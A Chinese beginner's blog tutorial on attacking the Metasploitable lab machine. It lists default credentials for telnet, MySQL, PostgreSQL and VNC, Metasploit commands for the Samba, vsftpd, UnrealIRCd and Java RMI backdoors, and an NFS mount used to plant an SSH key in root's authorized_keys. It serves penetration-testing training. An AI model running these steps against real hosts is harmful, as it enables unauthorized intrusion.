Kali与编程:小白黑客是如何漏洞攻防演练的?

每日寄语

所有的努力,不是为了让别人觉得你了不起,而是为了能让自己打心眼里看得起自己。

阅前声明

1、Kali与编程 & 笔名:事在人为 联合发布!

2、看到后面,还有福利哦!

一、系统弱密码登录

1、在kali上执行命令行telnet 192.168.26.129

2、Login和password都输入msfadmin

3、登录成功,进入系统

4、测试如下:

Kali与编程:小白黑客是如何漏洞攻防演练的?

二、MySQL弱密码登录:

1、在kali上执行mysql –h 192.168.26.129 –u root

2、登录成功,进入MySQL系统

3、测试效果:

Kali与编程:小白黑客是如何漏洞攻防演练的?

三、PostgreSQL弱密码登录

1、在Kali上执行psql -h 192.168.26.129 –U postgres

2、输入密码:postgres

3、登录成功,进入postgresql系统

测试效果

Kali与编程:小白黑客是如何漏洞攻防演练的?

四、VNC弱密码登录

1、在kali图形界面的终端中执行vncviewer 192.168.26.129

2、输入密码 password

3、登录成功,进入系统

测试效果:

Kali与编程:小白黑客是如何漏洞攻防演练的?

Kali与编程:小白黑客是如何漏洞攻防演练的?

五、Samba MS-RPC Shell 命令注入漏洞

利用步骤

1.在kali中执行msfconsole,启动metasploit

2.Use exploit/multi/samba/usermap_script,选择漏洞库

3.Set RHOST 192.168.160.131 设置要攻击的机器IP

4.Exploit,开始攻击

5.利用成功,执行uname –a 验证

测试效果:

Kali与编程:小白黑客是如何漏洞攻防演练的?

Kali与编程:小白黑客是如何漏洞攻防演练的?

Kali与编程:小白黑客是如何漏洞攻防演练的?

六、Vsftpd源码包后门漏洞

步骤

1、在kali中执行msfconsole,启动metasploit

2、use exploit/unix/ftp/vsftpd_234_backdoor,选择漏洞

3、set RHOST 192.168.160.131

4、利用成功,执行uname –a 验证

5、测试过程:

Kali与编程:小白黑客是如何漏洞攻防演练的?

Kali与编程:小白黑客是如何漏洞攻防演练的?

Kali与编程:小白黑客是如何漏洞攻防演练的?

七、UnreallRCd后门漏洞

步骤

1、在kali中执行msfconsole,启动metasploit

2、use exploit/unix/irc/unreal_ircd_3281_backdoor,选择漏洞

set RHOST 192.168.160.131 ,设置要攻击的目标IP地址

3、开始攻击

4、利用成功!使用uname –a 验证

测试效果:

Kali与编程:小白黑客是如何漏洞攻防演练的?

Kali与编程:小白黑客是如何漏洞攻防演练的?

Kali与编程:小白黑客是如何漏洞攻防演练的?

  1. Linux NFS共享目录配置漏洞

问题:在(2)中需要创建 /tmp/test目录并在目录下创建,如未创建则不能进行下一步

步骤

  1. 在kali上执行命令rpcinfo –p 192.168.26.129 ,查看nfs服务有无开启
  2. showmount –e 192.168.26.129 查看其设置的远程目录列表
  3. 输入ssh-keygen 生成RSA公钥
  4. 依次输入:

(1)mount –t nfs 192.168.26.129://tmp/test(预先创建),把192.168.160.131的根目录挂载到/tmp/test/下;

注:如果提示下图中错误则需要/etc/init.d/rpcbind start 来启动mount

(2)cat /root/.ssh/id_rsa.pub>>/tmp/test/root/.ssh/authorized_keys,把生成的公钥追加到靶机的authorized_keys下:

(3)ssh root@192.168.26.129,实现无密码登录

Kali与编程:小白黑客是如何漏洞攻防演练的?

Kali与编程:小白黑客是如何漏洞攻防演练的?

Kali与编程:小白黑客是如何漏洞攻防演练的?

  1. Java RMI SERVER 命令执行漏洞(1099/tcp)

1.Nmap –p 0-65535 192.168.160.131 来查看1099端口是否开启

2.进入msfconsole框架,依次输入以下命令:

1)use exploit/multi/misc/java_rmi_server

2)set RHOST 192.168.26.129(靶机的IP地址)

3)run

4)session

5)shell(进入meterpreter时执行)

Kali与编程:小白黑客是如何漏洞攻防演练的?

Kali与编程:小白黑客是如何漏洞攻防演练的?

Kali与编程:小白黑客是如何漏洞攻防演练的?

十、Root用户弱口令漏洞(SSH爆破)

步骤

  1. 输入nmap –sV -O(大写) 192.168.160.131 查看SSh端口是否开启
  2. 开启metasploit framework 框架,依次输入:
Kali与编程:小白黑客是如何漏洞攻防演练的?

Kali与编程:小白黑客是如何漏洞攻防演练的?

Kali与编程:小白黑客是如何漏洞攻防演练的?

展开阅读全文

页面更新:2024-03-10

标签:靶机   漏洞   事在人为   终端   攻防   后门   端口   框架   黑客   步骤   命令   效果   密码   地址   测试   目录   数码   系统

1 2 3 4 5

上滑加载更多 ↓
推荐阅读:
友情链接:
更多:

本站资料均由网友自行发布提供,仅用于学习交流。如有版权问题,请与我联系,QQ:4156828  

© CopyRight 2020-2024 All Rights Reserved. Powered By 71396.com 闽ICP备11008920号-4
闽公网安备35020302034903号

Top